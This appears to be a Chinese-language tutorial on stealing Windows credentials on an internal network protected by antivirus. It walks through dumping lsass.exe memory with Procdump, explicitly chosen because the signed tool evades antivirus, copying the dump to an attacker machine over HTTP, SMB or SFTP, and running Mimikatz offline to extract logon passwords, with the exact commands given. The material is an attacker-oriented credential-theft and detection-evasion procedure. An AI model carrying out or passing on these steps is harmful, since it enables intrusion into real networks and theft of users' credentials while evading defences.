15-11
约 552 字大约 2 分钟
2025-11-02
内网有杀软又怎么抓
1. 使用 Procdump 转储 lsass.exe 进程
Procdump 是微软 Sysinternals 工具集中的一个合法程序,它的主要功能是创建进程的内存转储文件(Memory Dump)。这个工具通常被系统管理员用来诊断程序崩溃
由于 Procdump 是一个合法的、微软签名的工具,很多杀毒软件默认将其视为可信程序,或者至少不会像对待 Mimikatz 那样立即拦截它对 lsass.exe 的访问
- 命令:
procdump64.exe -accepteula -ma lsass.exe lsass.dmp - 解释:
-accepteula:接受许可协议,避免交互式提示-ma:指定转储整个内存lsass.exe:目标进程lsass.dmp:输出的转储文件名
执行这个命令后,它会创建一个包含 lsass.exe 进程内存数据的 lsass.dmp 文件,并将其保存在磁盘上。这一步的重点在于:没有使用任何恶意工具,只使用了系统管理员常用的合法工具
2. 将转储文件下载到攻击机
这一步需要你将 lsass.dmp 文件从目标服务器下载到你的本地攻击机。你可以使用多种方法,例如:
- HTTP/HTTPS 文件传输: 在目标机器上通过
powershell或其他工具,将文件上传到你搭建的 Web 服务器。 - SMB/SFTP 传输: 如果网络环境允许,通过 SMB 共享或 SFTP 传输文件
这个过程可能会被杀毒软件或网络安全设备检测到,因此需要注意。但即使被检测到,也只是一个数据传输行为,而不是一个恶意代码执行行为
3. 使用 Mimikatz 离线读取转储文件
当 lsass.dmp 文件下载到你的攻击机后,你就可以在你的本地机器上运行 Mimikatz,并让它去分析这个转储文件,而不是去连接目标机器的 lsass.exe 进程
- 命令:
mimikatz.exeprivilege::debugsekurlsa::minidump lsass.dmpsekurlsa::logonpasswords
- 解释:
privilege::debug:获取调试权限,这是 Mimikatz 正常工作所必需的sekurlsa::minidump lsass.dmp:指定 Mimikatz 从lsass.dmp文件而不是实时进程中读取数据sekurlsa::logonpasswords:从加载的转储文件中提取登录凭据